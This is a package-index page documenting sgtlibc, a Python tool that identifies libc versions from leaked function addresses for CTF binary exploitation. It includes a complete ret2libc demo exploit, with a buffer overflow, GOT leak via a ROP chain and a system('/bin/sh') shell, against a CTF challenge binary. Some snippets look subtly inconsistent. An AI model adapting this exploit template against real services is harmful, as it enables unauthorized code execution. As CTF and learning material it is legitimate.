Skip to main content

a offline python-lib for search libc function.for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s = sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`

Project description

pypi version pypi download GitHub release GitHub All Releases GitHub last commit

WindowsLinuxUbuntuKaliFreeBSDDeepinDebianCent OS

What?

sgtlibc is a a offline python-lib for search libc function.

Install

pip install sgtlibc

Usage

usage: sgtlibc [-h] [-d [DUMP ...]] [-i [INDEX]] [-s [SYMBOLS]] [-u [UPDATE]] [-v [VERSION]] [funcs_with_addresses]

a offline python-lib for search libc function.for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s =
sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`

positional arguments:
  funcs_with_addresses  specify `func-name` and `func address` , split by `|`,eg: puts:aa0+read:140 , its means func-puts address = 0xaa0;func-read address = 0x140 (default: None).

options:
  -h, --help            show this help message and exit
  -d [DUMP ...], --dump [DUMP ...]
                        select funcs to dump its info (default: ['__libc_start_main_ret', 'system', 'dup2', 'read', 'write', 'str_bin_sh']).
  -i [INDEX], --index [INDEX]
                        db index on multi-database found occation (default: 0).
  -s [SYMBOLS], --symbols [SYMBOLS]
                        convert libc-elf file to symbols-file,use `libc_path [alias]` to convert.
  -u [UPDATE], --update [UPDATE]
                        update current libc database from internet , need non-microsoft-windows environment (default: False).
  -v [VERSION], --version [VERSION]
                        show version

Quick Start

  • in cmd.exeor/bin/sh`
sgtlibc puts:aa0
sgtlibc puts:aa0+read:140
sgtlibc puts:aa0+read:140 --dump system binsh
  • in python3
import sgtlibc
s = sgtlibc.Searcher()
s.add_condition('puts', 0xaa0)
s.add_condition('read',0x140)
print(s.dump())
print(s.dump(['system','str_bin_sh']))

Example

  • main args specify func-name and func address ,**SHOULD split by | **

    eg: puts:aa0+read:140 which means:

    • func-puts address = 0xaa0
    • func-read address = 0x140
  • --update is for update libc database from internet base on libc-database , require non-microsoft-window system

python run

  • run [python code above](/#/Quick Start) , you'll get output-result like following shows:

image-20220605212842313

command run

  • run command in terminal , you'll get output-result like following shows:

    image-20220605213023151

pwntools run

  • use in pwntools
from pwn import * # should run pip install pwntools before
import sgtlibc
s = libc.Searcher()
puts_addr = 0xf71234567aa0 # from leak data
s.add_condition('puts',puts_addr)
s.dump(db_index=0) # search libc , if returns multi-result ,default use index-0's result
system_addr = p00(s.get_address(sgtlibc.s_system))
binsh_addr = p00(s.get_address(sgtlibc.s_binsh))

use user-libc database

search libc from user-directory

from sgtlibc.utils import configuration as config
def test_use_user_libc():
    lib_path = './libs' # here input your libc directory
    config.set(config.extension_database_path, lib_path)
    s = LibcSearcher('puts', 0xf7007)
    s.decided()

add user-libc database

add a libc.so file to database

sgtlibc -s ./libc.from_user.so:alias_input_here

or

from sgtlibc.main import do_symbols
do_symbols(f'./libc.from_user.so:alias_input_here')

CTF Problem Solve DEMO

view all sameple files

  • use exploit code
import sgtlibc
from sgtlibc.gamebox import *
set_config(GameBoxConfig(
    is_local=True, file='./babyrop2', remote='192.168.0.1:25462',
    auto_load=True,
    auto_show_rop=True,
    auto_show_summary=True,
    auto_start_game=True,
    auto_load_shell_str=True,
    auto_show_symbols=True
))
s = sgtlibc.Searcher()
elf = client.elf
def exp():
	payload_exp = [b'a' * (28 + 4),fakeebp()] # overflow position
    return payload_exp
def leak(func: str):
    payload = exp()
    # here will auto-pack to p64, you can use p64 or p00 as same effect.
    payload += [elf.rop['rdi'],elf.got[func],elf.plt['printf'],elf.symbols['main']]
    sl(payload)
    rl()
    data = rc(6).ljust(8, b'\0')
    data = uc(data)
    s.add_condition(func, data)
    return data
leak('printf')
leak('read')
data = s.dump(db_index=2)  # choose your system index
system_addr = s.get_address(sgtlibc.s_system)
binsh_addr = s.get_address(sgtlibc.s_binsh)
log.info(f'system_addr:{hex(system_addr)}')
log.info(f'binsh_addr:{hex(binsh_addr)}')
payload = exp() 
payload += [elf.rop['rdi'],binsh_addr,system_addr, fakeebp()]
    
sl(payload)
interactive()
  • result

image-20220609134743902

Notice

default libc database is update on 2022-06-01,which long-time ago , we fully recommanded to update it by run sgtlibc --update

Status

Alt

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

sgtlibc-1.16.0.tar.gz (20.8 MB view details)

Uploaded Source

Built Distribution

sgtlibc-1.16.0-py3-none-any.whl (21.5 MB view details)

Uploaded Python 3

File details

Details for the file sgtlibc-1.16.0.tar.gz.

File metadata

  • Download URL: sgtlibc-1.16.0.tar.gz
  • Upload date:
  • Size: 20.8 MB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.2 CPython/3.11.4

File hashes

Hashes for sgtlibc-1.16.0.tar.gz
Algorithm Hash digest
SHA256 e1d6e7add0915a71e08f690a64c3113e36c0ccdec26162ac4ad4e26161f133b5
MD5 4c82d1a4d0808616697c160443cbf302
BLAKE2b-256 f2baa379a21402c2c874f74bfbb193e7af50d7e5681897a8c66a57cd4349c32f

See more details on using hashes here.

File details

Details for the file sgtlibc-1.16.0-py3-none-any.whl.

File metadata

  • Download URL: sgtlibc-1.16.0-py3-none-any.whl
  • Upload date:
  • Size: 21.5 MB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.2 CPython/3.11.4

File hashes

Hashes for sgtlibc-1.16.0-py3-none-any.whl
Algorithm Hash digest
SHA256 923bd978608d96995318b7071ba5798d091fb853dbb494e58ea4082c6f166610
MD5 f3c2bd826ae2bde51a8292acb8fd43e1
BLAKE2b-256 00504a6f2ff9448848bd785508c1e722b8ed587c1749a3ac1516781ff775078a

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page